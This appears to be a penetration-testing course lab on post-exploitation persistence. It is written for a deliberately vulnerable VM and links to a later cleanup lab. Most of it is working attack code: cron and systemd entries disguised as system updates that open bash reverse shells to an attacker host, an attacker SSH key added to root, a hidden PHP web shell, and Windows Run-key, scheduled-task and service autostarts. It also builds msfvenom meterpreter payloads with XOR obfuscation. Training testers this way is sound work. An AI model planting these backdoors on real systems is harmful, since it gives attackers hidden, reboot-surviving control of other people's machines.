Exam objective: 5.1 Persistence — scheduled tasks/cron, service creation, reverse/bind shell, backdoor (web shell, trojan), registry keys, C2.
In this lab you will plant four common Linux/Windows persistence mechanisms in a deliberately-vulnerable VM you control. Persistence is the heartbeat of the post-exploitation phase — every method below must be listed and removed during cleanup in Lab 37.
Target: any Linux box where you have root (Metasploitable3 or a docker container).
echo '* * * * * root bash -c "bash -i >& /dev/tcp/<KALI>/4444 0>&1"' \
| sudo tee /etc/cron.d/sysupdateCatcher on Kali:
nc -lvnp 4444A reverse shell will check in every minute.
User-level cron alternative:
(crontab -l 2>/dev/null; echo "*/5 * * * * /tmp/.helper.sh") | crontab -sudo tee /etc/systemd/system/sys-helper.service <<'EOF'
[Unit]
Description=System Helper
After=network.target
[Service]
ExecStart=/bin/bash -c "bash -i >& /dev/tcp/<KALI>/4444 0>&1"
Restart=always
RestartSec=60
[Install]
WantedBy=multi-user.target
EOF
sudo systemctl daemon-reload
sudo systemctl enable --now sys-helper.serviceSystemd survives reboots and auto-restarts — much stealthier than a one-shot cron.
mkdir -p /root/.ssh
echo 'ssh-ed25519 AAAA… attacker@kali' >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keysSurvives password rotation. Defenders should monitor authorized_keys integrity.
sudo tee /var/www/html/.cache.php <<'EOF'
<?php if (isset($_REQUEST['c'])) system($_REQUEST['c']); ?>
EOF
sudo chmod 644 /var/www/html/.cache.phpTriggers: curl http://target/.cache.php?c=id.
Use weevely for encrypted comms:
weevely generate Spring2026 /tmp/sh.php
# upload /tmp/sh.php to the doc root
weevely http://target/sh.php Spring2026| Mechanism | Command |
|---|---|
| Run-key autostart | reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /d "C:\users\public\agent.exe" |
| Scheduled task | schtasks /create /tn Updater /tr "C:\users\public\agent.exe" /sc onlogon /rl highest |
| Service | sc create UpdaterSvc binPath= "C:\users\public\agent.exe" start= auto |
| WMI event sub | via Invoke-CimInstance — see Atomic Red Team T1546.003 |
| Startup folder | drop .lnk into %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup |
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=<KALI> LPORT=4444 \
-f exe -o agent.exe -e x64/xor -i 5
msfvenom -p linux/x64/shell_reverse_tcp \
LHOST=<KALI> LPORT=4444 \
-f elf -o agent.elf-e x64/xor -i 5 lightly obfuscates (modern EDR still spots it — use only in authorised lab work).
Keep a persistence.log listing host, mechanism, file path, time:
2026-05-21 02:14 host=ms3prod cron=/etc/cron.d/sysupdate
2026-05-21 02:18 host=ms3prod systemd=/etc/systemd/system/sys-helper.service
2026-05-21 02:20 host=ms3prod webshell=/var/www/html/.cache.php
This log feeds the cleanup checklist in Lab 37 — never leave persistence behind.
- Five practical Linux persistence mechanisms (cron, systemd, ssh key, web shell, registry-on-Win).
- How
msfvenombuilds reverse-shell payloads in multiple formats. - Why every persistence artefact must be logged for cleanup.